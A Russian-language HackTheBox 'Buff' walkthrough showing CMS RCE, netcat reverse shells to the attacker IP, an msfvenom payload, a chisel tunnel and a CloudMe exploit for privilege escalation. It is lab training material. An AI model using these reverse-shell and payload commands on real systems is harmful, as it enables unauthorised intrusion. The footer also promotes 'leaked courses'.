![](https://habrastorage.org/webt/6r/yg/_b/6ryg_b0zncecr6wr7_rmznvoqpo.png)
Продолжаю публикацию решений, отправленных на дорешивание машин с площадки HackTheBox.
В данной статье эксплуатируем RCE в CMS Gym, строим туннель и повышаем привилегии через CloudMe.
Организационная информация
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Recon
Данная машина имеет IP адрес 10.10.10.198, который я добавляю в /etc/hosts.
10.10.10.198 buff.htb
Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент — адрес сканируемого хоста:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1
![](https://habrastorage.org/webt/wm/dl/hq/wmdlhqyfw8dmkio-jdmcltwffgc.png)
На хосте открыто два порта.
Entry Point
Посмотрим, что нам даст веб сервер.
![](https://habrastorage.org/webt/kp/lu/bu/kplubujjywwth68pysdtrvj-huo.png)
![](https://habrastorage.org/webt/km/p_/ap/kmp_apelmdwkrl2yva0vlg5npt4.png)
Находим версию CMS и можем посмотреть для нее эксплоиты.
![](https://habrastorage.org/webt/kj/ou/hm/kjouhm230sizqrv5ddza5nvg1z4.png)
![](https://habrastorage.org/webt/bj/dh/sj/bjdhsj1mzcjjfmqrksfh1lifvve.png)
![](https://habrastorage.org/webt/vk/s4/re/vks4reyszxdtnpo8xsulegm9_3c.png)
Отлично, мы имеем RCE.
USER
Давайте пробросим удобный шелл. Запустим на локальной машине веб-сервер.
python3 -m http.server 9999
И загрузим на удаленную машину netcat.
curl 10.10.14.114:9999/nc64.exe -O .\nc.exe
Теперь запустим листенер и кинем реверс шелл.
.\nc64.exe -e cmd.exe 10.10.14.114 6543
![](https://habrastorage.org/webt/y_/3n/nx/y_3nnx7qa9xucnurququhfgc_to.png)
ROOT
Проводим разведку на хосте и видим работающий от с повышенными привилегиями CloudMe.
![](https://habrastorage.org/webt/ou/vz/us/ouvzustfebxhbqwwoxlpg4y-ieq.png)
![](https://habrastorage.org/webt/j2/fs/kn/j2fsknzp78bxkcjehg04eiw7_jm.png)
Тоже посмотрим эксплоиты.
![](https://habrastorage.org/webt/xt/vk/ko/xtvkko_nnqwi11tjip8-fifhira.png)
![](https://habrastorage.org/webt/fc/ze/5y/fcze5ygapcukiaotqmjrcgdt13o.png)
Нам нужно сгенерировать свою нагрузку в формате python. Сделаем это с msfvenom.
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.114 9876' -b '\x00\x0A\x0D' -f py -v payload
![](https://habrastorage.org/webt/kl/8b/mi/kl8bmi4mop2_oixzc-mh19izw2o.png)
Так нагрузка будет отправлена на 8888 порт.
![](https://habrastorage.org/webt/sa/dy/dh/sadydhovfbj7kae134rj-xt6nxu.png)
Давайте сделаем туннель. Запустим сервер chisel на локальной машине.
./tools/chisel.bin server -p 56756 --reverse
![](https://habrastorage.org/webt/2z/ky/3q/2zky3qhefth3z1mtkeaai7eocw0.png)
И клиент на удаленной.
.\chisel.exe client 10.10.14.114:56756 R:8888:127.0.0.1:8888
![](https://habrastorage.org/webt/u6/gx/a2/u6gxa2tgsgz4jgnpyrsf-k2kfeg.png)
На локальной машине увидим успешное подключение.
![](https://habrastorage.org/webt/ha/mq/s8/hamqs8dadinoxzkhdqgnhpjghxk.png)
Теперь все, что приходит на локальный порт 8888 транслируется на тот же порт удаленной машины.
![](https://habrastorage.org/webt/7t/sj/i9/7tsji9yxzjs9dzjvja77ol3bz2q.png)
Выполняем эксплоит и получаем реверс шелл с повышенными привилегиями.
python 48389.py
![](https://habrastorage.org/webt/us/ur/be/usurbex32payn_etmfb8iz2bm0q.png)
Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.